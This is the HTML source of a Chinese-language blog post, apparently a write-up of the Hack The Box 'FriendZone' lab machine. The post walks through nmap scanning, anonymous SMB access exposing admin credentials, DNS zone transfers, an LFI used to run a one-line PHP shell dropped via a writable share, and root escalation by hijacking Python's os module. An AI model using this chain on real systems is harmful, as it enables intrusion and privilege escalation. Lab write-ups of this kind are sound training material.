-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHTB-linux-FriendZone.html
More file actions
405 lines (291 loc) · 31.3 KB
/
HTB-linux-FriendZone.html
File metadata and controls
405 lines (291 loc) · 31.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.css" integrity="sha256-zM8WXtG4eUn7dKKNMTuoWZub++VnSfaOpA/8PJfvTBo=" crossorigin="anonymous">
<script class="next-config" data-name="main" type="application/json">{"hostname":"owefsad.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>
<meta name="description" content="简介:靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。 靶机状态: 已完成">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Linux-FriendZone">
<meta property="og:url" content="https://owefsad.github.io/HTB-linux-FriendZone.html">
<meta property="og:site_name" content="owefsad">
<meta property="og:description" content="简介:靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。 靶机状态: 已完成">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2019-06-10T15:42:57.000Z">
<meta property="article:modified_time" content="2025-06-21T08:45:38.086Z">
<meta property="article:author" content="owefsad">
<meta property="article:tag" content="privilege_escalation">
<meta property="article:tag" content="smb">
<meta property="article:tag" content="zone_transfer">
<meta property="article:tag" content="LFI">
<meta property="article:tag" content="Hijacking">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://owefsad.github.io/HTB-linux-FriendZone.html">
<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://owefsad.github.io/HTB-linux-FriendZone.html","path":"HTB-linux-FriendZone.html","title":"HTB-Linux-FriendZone"}</script>
<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HTB-Linux-FriendZone | owefsad</title>
<script src="/js/third-party/analytics/baidu-analytics.js" defer></script>
<script async src="https://hm.baidu.com/hm.js?2a72b138b6ef81ae123fcd18e91fa843"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.js" integrity="sha256-hiUEBwFEpLF6DlB8sGXlKo4kPZ46Ui4qGpd0vrVkOm4=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>
<script src="/js/third-party/fancybox.js" defer></script>
<noscript>
<link rel="stylesheet" href="/css/noscript.css">
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<div class="column">
<header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<p class="site-title">owefsad</p>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">owefsad page</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger" aria-label="Search" role="button">
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-resume"><a href="/resume/" rel="section"><i class="fa fa-user fa-fw"></i>resume</a></li>
</ul>
</nav>
</header>
<aside class="sidebar">
<div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">目录</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#nmap"><span class="nav-number">1.0.1.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ftp"><span class="nav-number">1.0.2.</span> <span class="nav-text">ftp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#etbios-ssn-Samba"><span class="nav-number">1.0.3.</span> <span class="nav-text">etbios-ssn Samba</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dig"><span class="nav-number">1.0.4.</span> <span class="nav-text">dig</span></a></li></ol></li></ol></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">owefsad</p>
<div class="site-description" itemprop="description">分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具</div>
</div>
<div class="site-state-wrap animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">93</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">categories</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">173</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author animated">
<span class="links-of-author-item">
<a href="https://github.com/exexute" title="GitHub → https://github.com/exexute" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:1547147759@gmail.com" title="E-Mail → mailto:1547147759@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
</span>
</div>
</div>
</div>
</div>
</aside>
</div>
<div class="main-inner post posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
<link itemprop="mainEntityOfPage" href="https://owefsad.github.io/HTB-linux-FriendZone.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="owefsad">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="owefsad">
<meta itemprop="description" content="分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具">
</span>
<span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
<meta itemprop="name" content="HTB-Linux-FriendZone | owefsad">
<meta itemprop="description" content="">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
HTB-Linux-FriendZone<a href="https://github.com/owefsad/blog/tree/main/source/_posts/HTB-linux-FriendZone.md" class="post-edit-link" title="Edit this post" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
</h1>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2019-06-10 23:42:57" itemprop="dateCreated datePublished" datetime="2019-06-10T23:42:57+08:00">2019-06-10</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">In</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
</span>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody"><p>简介:<br>靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。</p>
<p>靶机状态: 已完成</p>
<span id="more"></span>
<h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li>SMB</li>
<li>Zone_Transfer</li>
<li>LFI</li>
<li>Hajicking</li>
</ul>
<blockquote>
<p>SMB</p>
</blockquote>
<h4 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h4><p>用nmap扫描机器的IP地址,发现开放的端口及对应的服务</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Nmap 7.70 scan initiated Sat May 25 23:31:31 2019 as: nmap -sC -sV -oA FriendZone 10.10.10.123</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.123</span><br><span class="line">Host is up (0.27s latency).</span><br><span class="line">Not shown: 993 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">21/tcp open ftp vsftpd 3.0.3</span><br><span class="line">22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)</span><br><span class="line">| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)</span><br><span class="line">|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)</span><br><span class="line">53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)</span><br><span class="line">| dns-nsid:</span><br><span class="line">|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu</span><br><span class="line">80/tcp open http Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Friend Zone Escape software</span><br><span class="line">139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">443/tcp open ssl/http Apache httpd 2.4.29</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: 404 Not Found</span><br><span class="line">| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO</span><br><span class="line">| Not valid before: 2018-10-05T21:02:30</span><br><span class="line">|_Not valid after: 2018-11-04T21:02:30</span><br><span class="line">| tls-alpn:</span><br><span class="line">|_ http/1.1</span><br><span class="line">445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)</span><br><span class="line">Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: mean: -59m46s, deviation: 1h43m51s, median: 10s</span><br><span class="line">|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span><br><span class="line">| smb-os-discovery:</span><br><span class="line">| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)</span><br><span class="line">| Computer name: friendzone</span><br><span class="line">| NetBIOS computer name: FRIENDZONE\x00</span><br><span class="line">| Domain name: \x00</span><br><span class="line">| FQDN: friendzone</span><br><span class="line">|_ System <span class="keyword">time</span>: 2019-05-25T18:32:12+03:00</span><br><span class="line">| smb-security-mode:</span><br><span class="line">| account_used: guest</span><br><span class="line">| authentication_level: user</span><br><span class="line">| challenge_response: supported</span><br><span class="line">|_ message_signing: disabled (dangerous, but default)</span><br><span class="line">| smb2-security-mode:</span><br><span class="line">| 2.02:</span><br><span class="line">|_ Message signing enabled but not required</span><br><span class="line">| smb2-time:</span><br><span class="line">| <span class="built_in">date</span>: 2019-05-25 23:32:06</span><br><span class="line">|_ start_date: N/A</span><br></pre></td></tr></table></figure>
<h4 id="ftp"><a href="#ftp" class="headerlink" title="ftp"></a>ftp</h4><p>尝试ftp匿名登陆失败</p>
<h4 id="etbios-ssn-Samba"><a href="#etbios-ssn-Samba" class="headerlink" title="etbios-ssn Samba"></a>etbios-ssn Samba</h4><p>smbmap、smbclient查看匿名登陆samba服务,从中搜索文件中的敏感信息</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# smbmap -u guest -H 10.10.10.123</span><br><span class="line">[+] Finding open SMB ports....</span><br><span class="line">[+] Guest SMB session established on 10.10.10.123...</span><br><span class="line">[+] IP: 10.10.10.123:445 Name: 10.10.10.123</span><br><span class="line"> Disk Permissions</span><br><span class="line"> ---- -----------</span><br><span class="line"> <span class="built_in">print</span>$ NO ACCESS</span><br><span class="line"> Files NO ACCESS</span><br><span class="line"> general READ ONLY</span><br><span class="line"> Development READ, WRITE</span><br><span class="line"> IPC$ NO ACCESS</span><br><span class="line"></span><br><span class="line">root@kali:~# <span class="built_in">cat</span> creds.txt</span><br><span class="line">creds <span class="keyword">for</span> the admin THING:</span><br><span class="line"></span><br><span class="line">admin:WORKWORKHhallelujah@#</span><br></pre></td></tr></table></figure>
<blockquote>
<p>Zone_Transfer</p>
</blockquote>
<p>机器开放53(DNS)端口, 所以尝试搜集DNS中的信息</p>
<h4 id="dig"><a href="#dig" class="headerlink" title="dig"></a>dig</h4><p>这里有一个很坑的地方, 第一此根据WEB页面中的friendzoneportal.red邮箱后缀, 于是用dig查friendzoneportal.red的子域; 一直无法找到突破口, 后来在一份wp上看到需要查friendzone.red的子域; 但暂不清楚具体的原因。查找所有的子域名后, 找到可用的子域名administrator1.friendzone.red.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# dig axfr friendzoneportal.red @FriendZone.htb</span><br><span class="line"></span><br><span class="line">; <<>> DiG 9.11.5-P4-3-Debian <<>> axfr friendzoneportal.red @FriendZone.htb</span><br><span class="line">;; global options: +cmd</span><br><span class="line">friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">friendzoneportal.red. 604800 IN AAAA ::1</span><br><span class="line">friendzoneportal.red. 604800 IN NS localhost.</span><br><span class="line">friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">admin.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">files.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">imports.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">vpn.friendzoneportal.red. 604800 IN A 127.0.0.1</span><br><span class="line">friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">;; Query <span class="keyword">time</span>: 252 msec</span><br><span class="line">;; SERVER: 10.10.10.123#53(10.10.10.123)</span><br><span class="line">;; WHEN: Sat Jun 01 03:31:49 EDT 2019</span><br><span class="line">;; XFR size: 9 records (messages 1, bytes 309)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看wp后继续进行</span></span><br><span class="line">➜ ~ dig axfr friendzone.red @FriendZone.htb</span><br><span class="line"></span><br><span class="line">; <<>> DiG 9.10.6 <<>> axfr friendzone.red @FriendZone.htb</span><br><span class="line">;; global options: +cmd</span><br><span class="line">friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">friendzone.red. 604800 IN AAAA ::1</span><br><span class="line">friendzone.red. 604800 IN NS localhost.</span><br><span class="line">friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">administrator1.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">hr.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">uploads.friendzone.red. 604800 IN A 127.0.0.1</span><br><span class="line">friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800</span><br><span class="line">;; Query <span class="keyword">time</span>: 234 msec</span><br><span class="line">;; SERVER: 10.10.10.123#53(10.10.10.123)</span><br><span class="line">;; WHEN: Thu Jun 20 11:12:25 CST 2019</span><br><span class="line">;; XFR size: 8 records (messages 1, bytes 261)</span><br></pre></td></tr></table></figure>
<p>发现域名<strong>friendzoneportal.red.</strong>、<strong>admin.friendzoneportal.red.</strong>、<strong>files.friendzoneportal.red.</strong>、<strong>imports.friendzoneportal.red.</strong>、<strong>vpn.friendzoneportal.red.</strong>、<strong>friendzone.red</strong>、<strong>administrator1.friendzone.red.</strong>、<strong>hr.friendzone.red.</strong>、<strong>uploads.friendzone.red.</strong>, 共9个</p>
<blockquote>
<p>LFI</p>
</blockquote>
<p>访问administrator1.friendzone.red站点, 输入从SMB共享中找到的账号密码, 发现一处LFI: ``, 通过SMB共享在Development目录中写入webshell即可获得反弹webshell, </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="title function_ invoke__">system</span>(<span class="string">"/bin/sh -"</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>拿到webshell后, 成功读取user.txt</p>
<blockquote>
<p>Hajicking</p>
</blockquote>
<p>通过webshell后在网站目录中找到mysql数据库的账号密码:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql_data.conf:</span><br><span class="line"> <span class="attribute">db_user</span>=friend</span><br><span class="line"> <span class="attribute">db_pass</span>=Agpyu12!0.213$</span><br><span class="line"> <span class="attribute">db_name</span>=FZ</span><br></pre></td></tr></table></figure>
<p>用账号密码登陆ssh服务, 通过LinEnum.sh查找可利用弱点未果, 用pspy64查找系统中隐藏的内容时发现两个有意思的地方, 新用户登录时, 会用root权限设置环境变量并用相对路径执行cut命令; 机器会定时用root权限执行一次<code>/usr/bin/python /opt/server_admin/reporter.py</code>; 有了这两个内容后,可以考虑Hajicking cut、python的包或者修改/opt/server_admin/reporter.py文件提权;<br>通过<code>find / -type d -writable 2>/dev/null</code>查看可写目录, 发现PATH中的目录不可写, 但<code>/usr/lib/python2.7</code>目录可写, 因此Hajicking cut这条路不通, 考虑python; 最后通过Hajicking python的os包实现了提权.</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">friend<span class="variable">@FriendZone</span><span class="symbol">:/tmp</span><span class="variable">$ </span>cat owef.txt</span><br><span class="line">b0e6c60b8*********<span class="number">656</span>a9e90c7</span><br></pre></td></tr></table></figure>
<blockquote>
<p>卡点</p>
</blockquote>
<p>卡点1: dig查域传送时, 忽略了friendzone.red子域, 但是为什么会查这个子域呢?可能猜测这块是我最不擅长的地方吧, 没想到查这个地方, 导致一直无法找到HAHA page。<br>卡点2: 找到HAHA page后,需要通过LFI加载php文件, 但是一致无法找到有效目录, 后来用nmap自带的enum模块扫了一下smb端口才发现, 原来nmap枚举可以显示出共享文件对应的物理文件路径;<br>卡点3: python Hajicking, 初次遇到.</p>
<blockquote>
<p>参考文章</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://johnkoerner.com/codemash/codemash-ctf-solution-2019-08/">dig</a></p>
</div>
<footer class="post-footer">
<div class="followme">
<span>Welcome to my other publishing channels</span>
<div class="social-list">
<div class="social-item">
<span class="social-link">
<span class="icon">
<i class="fab fa-weixin"></i>
</span>
<span class="label">WeChat</span>
</span>
<img class="social-item-img" src="/uploads/wechat-qcode.jpg">
</div>
<div class="social-item">
<a target="_blank" class="social-link" href="/uploads/avatar.gif">
<span class="icon">
<i class="fab fa-qq"></i>
</span>
<span class="label">QQ</span>
</a>
</div>
</div>
</div>
<div class="post-tags">
<a href="/tags/privilege-escalation/" rel="tag"># privilege_escalation</a>
<a href="/tags/smb/" rel="tag"># smb</a>
<a href="/tags/zone-transfer/" rel="tag"># zone_transfer</a>
<a href="/tags/LFI/" rel="tag"># LFI</a>
<a href="/tags/Hijacking/" rel="tag"># Hijacking</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/HTB-linux-SwagShop.html" rel="prev" title="HTB-Linux-SwagShop">
<i class="fa fa-angle-left"></i> HTB-Linux-SwagShop
</a>
</div>
<div class="post-nav-item">
<a href="/how-hacking-in-DNS.html" rel="next" title="How Hacking in DNS">
How Hacking in DNS <i class="fa fa-angle-right"></i>
</a>
</div>
</div>
</footer>
</article>
</div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
© 2017 –
<span itemprop="copyrightYear">2025</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">owefsad</span>
</div>
</div>
</footer>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<div class="sidebar-dimmer"></div>
<div class="back-to-top" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up fa-lg"></i>
<span>0%</span>
</div>
<a href="https://github.com/exexute" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
</body>
</html>